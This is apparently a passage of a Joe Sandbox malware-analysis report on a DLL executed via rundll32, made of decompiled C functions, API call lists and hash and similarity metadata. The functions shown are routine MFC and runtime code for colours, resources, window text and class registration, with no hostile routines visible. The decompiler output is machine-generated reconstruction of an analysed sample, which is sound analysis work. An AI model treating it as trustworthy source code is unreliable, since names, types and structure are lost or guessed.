                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Rect$EmptyEqualIntersectInvalidate
                                                                                                            • String ID:
                                                                                                            • API String ID: 3354205298-0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 100%
                                                                                                            			E100214B2(struct HDC__* _a4, struct HWND__* _a8, intOrPtr _a12, void* _a16, long _a20) {
                                                                                                            				long _v12;
                                                                                                            				void _v16;
                                                                                                            				intOrPtr _t12;
                                                                                                            				long _t16;
                                                                                                            
                                                                                                            				if(_a4 == 0 || _a16 == 0) {
                                                                                                            					L10:
                                                                                                            					return 0;
                                                                                                            				} else {
                                                                                                            					_t12 = _a12;
                                                                                                            					if(_t12 == 1 || _t12 == 0 || _t12 == 5 || _t12 == 2 && E10029A8E(_a8, _t12) == 0) {
                                                                                                            						goto L10;
                                                                                                            					} else {
                                                                                                            						GetObjectA(_a16, 0xc,  &_v16);
                                                                                                            						SetBkColor(_a4, _v12);
                                                                                                            						_t16 = _a20;
                                                                                                            						if(_t16 == 0xffffffff) {
                                                                                                            							_t16 = GetSysColor(8);
                                                                                                            						}
                                                                                                            						SetTextColor(_a4, _t16);
                                                                                                            						return 1;
                                                                                                            					}
                                                                                                            				}
                                                                                                            			}








                                                                                                            APIs
                                                                                                            • GetObjectA.GDI32(00000000,0000000C,?), ref: 100214F0
                                                                                                            • SetBkColor.GDI32(00000000,00000000), ref: 100214FC
                                                                                                            • GetSysColor.USER32(00000008), ref: 1002150C
                                                                                                            • SetTextColor.GDI32(00000000,?), ref: 10021516
                                                                                                              • Part of subcall function 10029A8E: GetWindowLongA.USER32 ref: 10029AA7
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Color$LongObjectTextWindow
                                                                                                            • String ID:
                                                                                                            • API String ID: 2871169696-0
                                                                                                            • Opcode ID: 270bb4ef9b18727549db2e87848aeeb4d20cea516dda6394fdb349df2a5cdfde
                                                                                                            • Instruction ID: 07a055e2fde14eb44e4b892d4051d3cd351fecf6f4b2367e44398545aae672e6
                                                                                                            • Opcode Fuzzy Hash: 270bb4ef9b18727549db2e87848aeeb4d20cea516dda6394fdb349df2a5cdfde
                                                                                                            • Instruction Fuzzy Hash: 0301283A900529EBEB429FA0EC85AEB3BA4EB55291F908560FD13C40A1C730CD90DB51
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 100%
                                                                                                            			E1002415A(void* __ecx, CHAR* _a4) {
                                                                                                            				void* __edi;
                                                                                                            				struct HRSRC__* _t8;
                                                                                                            				void* _t9;
                                                                                                            				void* _t11;
                                                                                                            				void* _t14;
                                                                                                            				void* _t15;
                                                                                                            				struct HINSTANCE__* _t16;
                                                                                                            				void* _t17;
                                                                                                            
                                                                                                            				_t14 = 0;
                                                                                                            				_t11 = 0;
                                                                                                            				_t17 = __ecx;
                                                                                                            				if(_a4 == 0) {
                                                                                                            					L4:
                                                                                                            					_t15 = E100232BF(_t17, _t14, _t11);
                                                                                                            					if(_t11 != 0 && _t14 != 0) {
                                                                                                            						FreeResource(_t14);
                                                                                                            					}
                                                                                                            					return _t15;
                                                                                                            				}
                                                                                                            				_t16 =  *(E100373B5() + 0xc);
                                                                                                            				_t8 = FindResourceA(_t16, _a4, 0xf0);
                                                                                                            				if(_t8 == 0) {
                                                                                                            					goto L4;
                                                                                                            				}
                                                                                                            				_t9 = LoadResource(_t16, _t8);
                                                                                                            				_t14 = _t9;
                                                                                                            				if(_t14 != 0) {
                                                                                                            					_t11 = LockResource(_t14);
                                                                                                            					goto L4;
                                                                                                            				}
                                                                                                            				return _t9;
                                                                                                            			}












                                                                                                            APIs
                                                                                                            • FindResourceA.KERNEL32(?,?,000000F0), ref: 1002417C
                                                                                                            • LoadResource.KERNEL32(?,00000000,?,?,?,?,1001EFB5,?,?,10006635), ref: 10024188
                                                                                                            • LockResource.KERNEL32(00000000,?,?,?,?,1001EFB5,?,?,10006635), ref: 10024195
                                                                                                            • FreeResource.KERNEL32(00000000,?,?,?,?,1001EFB5,?,?,10006635), ref: 100241B0
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Resource$FindFreeLoadLock
                                                                                                            • String ID:
                                                                                                            • API String ID: 1078018258-0
                                                                                                            • Opcode ID: 1bfed9c45fcc7c4252f354aa1b7bd718f75082ca3ca7a644671ccf1c6bb2871f
                                                                                                            • Instruction ID: fdd0e0ea882c3c69c4099ed456d0cfd7dce8bbf4e7d741b6fad66cb09ea4bd77
                                                                                                            • Opcode Fuzzy Hash: 1bfed9c45fcc7c4252f354aa1b7bd718f75082ca3ca7a644671ccf1c6bb2871f
                                                                                                            • Instruction Fuzzy Hash: 40F0903A2412256FD3029FA65C88D3FB6FDEFB59E6B424038FD05D6212DE209C5587A1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 82%
                                                                                                            			E1002095F(void* __ecx) {
                                                                                                            				int _t26;
                                                                                                            				int _t28;
                                                                                                            				void* _t41;
                                                                                                            
                                                                                                            				E10011BF0(0x1003a4d8, _t41);
                                                                                                            				_push(__ecx);
                                                                                                            				if( *((intOrPtr*)(__ecx + 0x4c)) != 0) {
                                                                                                            					 *(_t41 - 0x10) =  *((intOrPtr*)( *((intOrPtr*)(E100243B2())) + 0xc))() + 0x10;
                                                                                                            					 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
                                                                                                            					_push(_t41 - 0x10);
                                                                                                            					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x4c)))) + 0x8c))();
                                                                                                            					lstrcpynA( *(_t41 + 8),  *(_t41 - 0x10),  *(_t41 + 0xc));
                                                                                                            					_t26 = lstrlenA( *(_t41 + 8));
                                                                                                            					E100014B0( &(( *(_t41 - 0x10))[0xfffffffffffffff0]), _t41 - 0x10);
                                                                                                            					_t28 = _t26;
                                                                                                            				} else {
                                                                                                            					_t28 = GetWindowTextA( *(__ecx + 0x1c),  *(_t41 + 8),  *(_t41 + 0xc));
                                                                                                            				}
                                                                                                            				 *[fs:0x0] =  *((intOrPtr*)(_t41 - 0xc));
                                                                                                            				return _t28;
                                                                                                            			}







                                                                                                            APIs
                                                                                                            • __EH_prolog.LIBCMT ref: 10020964
                                                                                                            • GetWindowTextA.USER32 ref: 1002097C
                                                                                                            • lstrcpynA.KERNEL32(?,?,?,?,?,1002CC3A,?,00000104,?), ref: 100209B2
                                                                                                            • lstrlenA.KERNEL32(?,?,?,1002CC3A,?,00000104,?), ref: 100209BB
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: H_prologTextWindowlstrcpynlstrlen
                                                                                                            • String ID:
                                                                                                            • API String ID: 3022380644-0
                                                                                                            • Opcode ID: 85d23a542434996f255d9aee2352e9f09da7a367e08aff553ccb44c9efc23bd1
                                                                                                            • Instruction ID: 9a5806592f70ea17751b7fdaa6094fb832eb62a9ddc39452fd7da2019fb28030
                                                                                                            • Opcode Fuzzy Hash: 85d23a542434996f255d9aee2352e9f09da7a367e08aff553ccb44c9efc23bd1
                                                                                                            • Instruction Fuzzy Hash: 75019E36900129EFDB05DFA4CC48BAEBBB2FF48314F00C619F512AB262CB719950DB90
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 100%
                                                                                                            			E1001B66F(void* __eflags, intOrPtr* _a4, intOrPtr* _a8) {
                                                                                                            				void* _t12;
                                                                                                            				void* _t18;
                                                                                                            				intOrPtr* _t20;
                                                                                                            				void* _t21;
                                                                                                            				void* _t22;
                                                                                                            
                                                                                                            				_t20 = _a4;
                                                                                                            				_t19 = _a8;
                                                                                                            				_t12 = E1001B64E( *_t20,  *_a8, _t20);
                                                                                                            				_t22 = _t21 + 0xc;
                                                                                                            				if(_t12 != 0) {
                                                                                                            					_t3 = _t20 + 4; // 0x4
                                                                                                            					_t18 = E1001B64E( *_t3, 1, _t3);
                                                                                                            					_t22 = _t22 + 0xc;
                                                                                                            					if(_t18 != 0) {
                                                                                                            						 *((intOrPtr*)(_t20 + 8)) =  *((intOrPtr*)(_t20 + 8)) + 1;
                                                                                                            					}
                                                                                                            				}
                                                                                                            				_t6 = _t20 + 4; // 0x4
                                                                                                            				if(E1001B64E( *_t6,  *((intOrPtr*)(_t19 + 4)), _t6) != 0) {
                                                                                                            					 *((intOrPtr*)(_t20 + 8)) =  *((intOrPtr*)(_t20 + 8)) + 1;
                                                                                                            				}
                                                                                                            				_t10 = _t20 + 8; // 0x8
                                                                                                            				return E1001B64E( *_t10,  *((intOrPtr*)(_t19 + 8)), _t10);
                                                                                                            			}









                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ___addl
                                                                                                            • String ID:
                                                                                                            • API String ID: 2260456530-0
                                                                                                            • Opcode ID: 0010489af6f0204a76aa343dff914e49e539203f3853c838d62e7c6bfc1b52c0
                                                                                                            • Instruction ID: 1cba6355bd62d8335d9ad848ad702df172e9c7a68b0d5ea6ff045fc298979a71
                                                                                                            • Opcode Fuzzy Hash: 0010489af6f0204a76aa343dff914e49e539203f3853c838d62e7c6bfc1b52c0
                                                                                                            • Instruction Fuzzy Hash: 37F06D7A800A02EFDA548B52DC02EA6B7E9FF65240B004425FD598A031EB32E8A9CB51
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 100%
                                                                                                            			E10029B23(void* __esi, struct HWND__* _a4, CHAR* _a8) {
                                                                                                            				intOrPtr _v8;
                                                                                                            				char _v264;
                                                                                                            				intOrPtr _t10;
                                                                                                            				int _t20;
                                                                                                            
                                                                                                            				_t10 =  *0x1004c470; // 0x6edecb8c
                                                                                                            				_v8 = _t10;
                                                                                                            				_t20 = lstrlenA(_a8);
                                                                                                            				if(_t20 > 0x100 || GetWindowTextA(_a4,  &_v264, 0x100) != _t20 || lstrcmpA( &_v264, _a8) != 0) {
                                                                                                            					_t13 = SetWindowTextA(_a4, _a8);
                                                                                                            				}
                                                                                                            				return E100117AE(_t13, _v8);
                                                                                                            			}








                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: TextWindow$lstrcmplstrlen
                                                                                                            • String ID:
                                                                                                            • API String ID: 330964273-0
                                                                                                            • Opcode ID: 49ff855ffa8cc10cf004c62dcee453a07d27d3b0eafd92cf3458448ca621e64d
                                                                                                            • Instruction ID: 93620f556a2fd5ec9caf7d88bc5fd11bb860ddfd3ca1ea698490334ddcd31a8c
                                                                                                            • Opcode Fuzzy Hash: 49ff855ffa8cc10cf004c62dcee453a07d27d3b0eafd92cf3458448ca621e64d
                                                                                                            • Instruction Fuzzy Hash: 42F04F7690002CAFDF129FA0DD84DDDBBB9EB04380F008111F946DA120D730DE908B50
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 100%
                                                                                                            			E100308EB(void* __ecx, void* __eflags) {
                                                                                                            				signed int _t8;
                                                                                                            				int _t9;
                                                                                                            				void* _t11;
                                                                                                            				void* _t12;
                                                                                                            				signed int* _t13;
                                                                                                            				void* _t14;
                                                                                                            
                                                                                                            				_t12 = __ecx;
                                                                                                            				E10030582(__ecx, __eflags, 1);
                                                                                                            				ReleaseCapture();
                                                                                                            				_t11 = E100220EE(_t14, GetDesktopWindow());
                                                                                                            				LockWindowUpdate(0);
                                                                                                            				_t13 = _t12 + 0x84;
                                                                                                            				_t8 =  *_t13;
                                                                                                            				if(_t8 != 0) {
                                                                                                            					_t9 = ReleaseDC( *(_t11 + 0x1c),  *(_t8 + 4));
                                                                                                            					 *_t13 =  *_t13 & 0x00000000;
                                                                                                            					return _t9;
                                                                                                            				}
                                                                                                            				return _t8;
                                                                                                            			}










                                                                                                            APIs
                                                                                                              • Part of subcall function 10030582: GetStockObject.GDI32(00000000), ref: 10030598
                                                                                                              • Part of subcall function 10030582: InflateRect.USER32(?,000000FF,000000FF), ref: 1003062D
                                                                                                            • ReleaseCapture.USER32(?,?,1003093E), ref: 100308F6
                                                                                                            • GetDesktopWindow.USER32 ref: 100308FC
                                                                                                            • LockWindowUpdate.USER32(00000000,00000000,?,?,1003093E), ref: 1003090C
                                                                                                            • ReleaseDC.USER32 ref: 10030924
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ReleaseWindow$CaptureDesktopInflateLockObjectRectStockUpdate
                                                                                                            • String ID:
                                                                                                            • API String ID: 1260764132-0
                                                                                                            • Opcode ID: d5f880df9b7f123afe39f0741efa6f586c3ee5538d0bb60a1943d3de393b2b3c
                                                                                                            • Instruction ID: cc833fa3e0bd0d4d25e579e7f05375a90551c712b7101b0f89079a167d1ea1eb
                                                                                                            • Opcode Fuzzy Hash: d5f880df9b7f123afe39f0741efa6f586c3ee5538d0bb60a1943d3de393b2b3c
                                                                                                            • Instruction Fuzzy Hash: F2E04837500224AFE7225F65DD5DF457A64EF40752F158424F541DE0A3CA75D8D1CB50
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 65%
                                                                                                            			E100128A7(void* __ebx, void* __edi, void* __esi) {
                                                                                                            				intOrPtr _v8;
                                                                                                            				char _v21;
                                                                                                            				signed char _v22;
                                                                                                            				struct _cpinfo _v28;
                                                                                                            				char _v284;
                                                                                                            				char _v540;
                                                                                                            				char _v796;
                                                                                                            				char _v1308;
                                                                                                            				void* __ebp;
                                                                                                            				intOrPtr _t42;
                                                                                                            				signed int _t45;
                                                                                                            				char _t47;
                                                                                                            				signed char _t48;
                                                                                                            				signed int _t58;
                                                                                                            				signed int _t59;
                                                                                                            				signed int _t65;
                                                                                                            				signed int _t68;
                                                                                                            				signed char _t70;
                                                                                                            				char _t71;
                                                                                                            				signed int _t73;
                                                                                                            				signed int _t74;
                                                                                                            				signed char* _t78;
                                                                                                            				signed char* _t79;
                                                                                                            				void* _t81;
                                                                                                            				void* _t86;
                                                                                                            				void* _t87;
                                                                                                            
                                                                                                            				_t80 = __edi;
                                                                                                            				_t63 = __ebx;
                                                                                                            				_t42 =  *0x1004c470; // 0x6edecb8c
                                                                                                            				_v8 = _t42;
                                                                                                            				if(GetCPInfo( *0x10050b84,  &_v28) != 1) {
                                                                                                            					_t45 = 0;
                                                                                                            					__eflags = 0;
                                                                                                            					do {
                                                                                                            						__eflags = _t45 - 0x41;
                                                                                                            						if(_t45 < 0x41) {
                                                                                                            							L23:
                                                                                                            							__eflags = _t45 - 0x61;
                                                                                                            							if(_t45 < 0x61) {
                                                                                                            								L26:
                                                                                                            								 *(_t45 + 0x10050ba0) = 0;
                                                                                                            							} else {
                                                                                                            								__eflags = _t45 - 0x7a;
                                                                                                            								if(_t45 > 0x7a) {
                                                                                                            									goto L26;
                                                                                                            								} else {
                                                                                                            									 *(_t45 + 0x10050a81) =  *(_t45 + 0x10050a81) | 0x00000020;
                                                                                                            									_t68 = _t45 - 0x20;
                                                                                                            									goto L22;
                                                                                                            								}
                                                                                                            							}
                                                                                                            						} else {
                                                                                                            							__eflags = _t45 - 0x5a;
                                                                                                            							if(_t45 > 0x5a) {
                                                                                                            								goto L23;
                                                                                                            							} else {
                                                                                                            								 *(_t45 + 0x10050a81) =  *(_t45 + 0x10050a81) | 0x00000010;
                                                                                                            								_t68 = _t45 + 0x20;
                                                                                                            								__eflags = _t68;
                                                                                                            								L22:
                                                                                                            								 *(_t45 + 0x10050ba0) = _t68;
                                                                                                            							}
                                                                                                            						}
                                                                                                            						_t45 = _t45 + 1;
                                                                                                            						__eflags = _t45 - 0x100;
                                                                                                            					} while (_t45 < 0x100);
                                                                                                            				} else {
                                                                                                            					_t47 = 0;
                                                                                                            					do {
                                                                                                            						 *((char*)(_t86 + _t47 - 0x118)) = _t47;
                                                                                                            						_t47 = _t47 + 1;
                                                                                                            					} while (_t47 < 0x100);
                                                                                                            					_t48 = _v22;
                                                                                                            					_v284 = 0x20;
                                                                                                            					if(_t48 != 0) {
                                                                                                            						_push(__ebx);
                                                                                                            						_t78 =  &_v21;
                                                                                                            						_push(__edi);
                                                                                                            						do {
                                                                                                            							_t65 =  *_t78 & 0x000000ff;
                                                                                                            							_t59 = _t48 & 0x000000ff;
                                                                                                            							if(_t59 <= _t65) {
                                                                                                            								_t73 = _t65 - _t59 + 1;
                                                                                                            								_t74 = _t73 >> 2;
                                                                                                            								_t81 = _t86 + _t59 - 0x118;
                                                                                                            								memset(_t81 + _t74, memset(_t81, 0x20202020, _t74 << 2), (_t73 & 0x00000003) << 0);
                                                                                                            								_t87 = _t87 + 0x18;
                                                                                                            								_t65 = 0;
                                                                                                            							}
                                                                                                            							_t79 =  &(_t78[1]);
                                                                                                            							_t48 =  *_t79;
                                                                                                            							_t78 =  &(_t79[1]);
                                                                                                            							_t96 = _t48;
                                                                                                            						} while (_t48 != 0);
                                                                                                            						_pop(_t80);
                                                                                                            						_pop(_t63);
                                                                                                            					}
                                                                                                            					_push(0);
                                                                                                            					_push( *0x10050a68);
                                                                                                            					_push( *0x10050b84);
                                                                                                            					_push( &_v1308);
                                                                                                            					_push(0x100);
                                                                                                            					_push( &_v284);
                                                                                                            					_push(1);
                                                                                                            					E1001843D(_t63, _t65, _t80, 0x100, _t96);
                                                                                                            					_push(0);
                                                                                                            					_push( *0x10050b84);
                                                                                                            					_push(0x100);
                                                                                                            					_push( &_v540);
                                                                                                            					_push(0x100);
                                                                                                            					_push( &_v284);
                                                                                                            					_push(0x100);
                                                                                                            					_push( *0x10050a68);
                                                                                                            					E10018081(_t63, _t80, 0x100, _t96);
                                                                                                            					_push(0);
                                                                                                            					_push( *0x10050b84);
                                                                                                            					_push(0x100);
                                                                                                            					_push( &_v796);
                                                                                                            					_push(0x100);
                                                                                                            					_push( &_v284);
                                                                                                            					_push(0x200);
                                                                                                            					_push( *0x10050a68);
                                                                                                            					E10018081(_t63, _t80, 0x100, _t96);
                                                                                                            					_t58 = 0;
                                                                                                            					do {
                                                                                                            						_t70 =  *((intOrPtr*)(_t86 + _t58 * 2 - 0x518));
                                                                                                            						if((_t70 & 0x00000001) == 0) {
                                                                                                            							__eflags = _t70 & 0x00000002;
                                                                                                            							if((_t70 & 0x00000002) == 0) {
                                                                                                            								 *((char*)(_t58 + 0x10050ba0)) = 0;
                                                                                                            							} else {
                                                                                                            								 *(_t58 + 0x10050a81) =  *(_t58 + 0x10050a81) | 0x00000020;
                                                                                                            								_t71 =  *((intOrPtr*)(_t86 + _t58 - 0x318));
                                                                                                            								goto L12;
                                                                                                            							}
                                                                                                            						} else {
                                                                                                            							 *(_t58 + 0x10050a81) =  *(_t58 + 0x10050a81) | 0x00000010;
                                                                                                            							_t71 =  *((intOrPtr*)(_t86 + _t58 - 0x218));
                                                                                                            							L12:
                                                                                                            							 *((char*)(_t58 + 0x10050ba0)) = _t71;
                                                                                                            						}
                                                                                                            						_t58 = _t58 + 1;
                                                                                                            					} while (_t58 < 0x100);
                                                                                                            				}
                                                                                                            				return E100117AE(_t45, _v8);
                                                                                                            			}






























                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Info
                                                                                                            • String ID: $
                                                                                                            • API String ID: 1807457897-3032137957
                                                                                                            • Opcode ID: e1feaf72be715a4ff1946e31e99b5ac143a73204088819c920269db308c45d83
                                                                                                            • Instruction ID: 0aa4f3d34f00a4262c94cc47b2ead2c87a4a0533aa2425fc92cd258cd4020972
                                                                                                            • Opcode Fuzzy Hash: e1feaf72be715a4ff1946e31e99b5ac143a73204088819c920269db308c45d83
                                                                                                            • Instruction Fuzzy Hash: 304106B15043AC9FEB55CA68CC95BEE7BA8EF05304F2044E1E981DB162C7708AD5D791
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 78%
                                                                                                            			E10021810(void* __ecx, int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                            				struct _WNDCLASSA _v44;
                                                                                                            				void* __ebx;
                                                                                                            				void* __ebp;
                                                                                                            				void* _t25;
                                                                                                            				intOrPtr _t37;
                                                                                                            				void* _t38;
                                                                                                            				struct HINSTANCE__* _t41;
                                                                                                            				CHAR* _t43;
                                                                                                            
                                                                                                            				_t38 = __ecx;
                                                                                                            				_t43 = E100373A5() + 0x7c;
                                                                                                            				_t25 = E100373B5();
                                                                                                            				_t37 = _a8;
                                                                                                            				_t41 =  *(_t25 + 8);
                                                                                                            				if(_t37 != 0 || _a12 != _t37) {
                                                                                                            					L4:
                                                                                                            					_push(_a16);
                                                                                                            					_push(_a12);
                                                                                                            					_push(_t37);
                                                                                                            					_push(_a4);
                                                                                                            					E10012068(_t37, _t38, __eflags, _t43, "Afx:%p:%x:%p:%p:%p", _t41);
                                                                                                            					goto L5;
                                                                                                            				} else {
                                                                                                            					_t49 = _a16 - _t37;
                                                                                                            					if(_a16 != _t37) {
                                                                                                            						goto L4;
                                                                                                            					}
                                                                                                            					_push(_a4);
                                                                                                            					E10012068(_t37, _t38, _t49, _t43, "Afx:%p:%x", _t41);
                                                                                                            					L5:
                                                                                                            					if(GetClassInfoA(_t41, _t43,  &_v44) == 0) {
                                                                                                            						_v44.style = _a4;
                                                                                                            						_v44.lpfnWndProc = DefWindowProcA;
                                                                                                            						_v44.cbWndExtra = 0;
                                                                                                            						_v44.cbClsExtra = 0;
                                                                                                            						_v44.lpszMenuName = 0;
                                                                                                            						_v44.hIcon = _a16;
                                                                                                            						_t40 = _a12;
                                                                                                            						_push( &_v44);
                                                                                                            						_v44.hInstance = _t41;
                                                                                                            						_v44.hCursor = _t37;
                                                                                                            						_v44.hbrBackground = _a12;
                                                                                                            						_v44.lpszClassName = _t43;
                                                                                                            						if(E10020B9B() == 0) {
                                                                                                            							E10028C0C(_t40);
                                                                                                            						}
                                                                                                            					}
                                                                                                            					return _t43;
                                                                                                            				}
                                                                                                            			}












                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ClassInfo
                                                                                                            • String ID: Afx:%p:%x$Afx:%p:%x:%p:%p:%p
                                                                                                            • API String ID: 3534257612-2801496823
                                                                                                            • Opcode ID: bac3525874c531d32c2609508dd072fba15194ad53eac21eeb6b2515cb8fd036
                                                                                                            • Instruction ID: 52b857fe777198d334fd01ba6041a527614e5ef36dd32a96c670ed063e64d698
                                                                                                            • Opcode Fuzzy Hash: bac3525874c531d32c2609508dd072fba15194ad53eac21eeb6b2515cb8fd036
                                                                                                            • Instruction Fuzzy Hash: 77214DB5D00259AFDB01DFA5D8819DEBBF8FF58290F41402AF908E7201E7309A50CBA1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 95%
                                                                                                            			E100165C9() {
                                                                                                            				signed int _v8;
                                                                                                            				char _v12;
                                                                                                            				void* __ecx;
                                                                                                            				void* __esi;
                                                                                                            				CHAR* _t10;
                                                                                                            				signed int _t16;
                                                                                                            				signed int _t22;
                                                                                                            				CHAR* _t25;
                                                                                                            				signed int _t34;
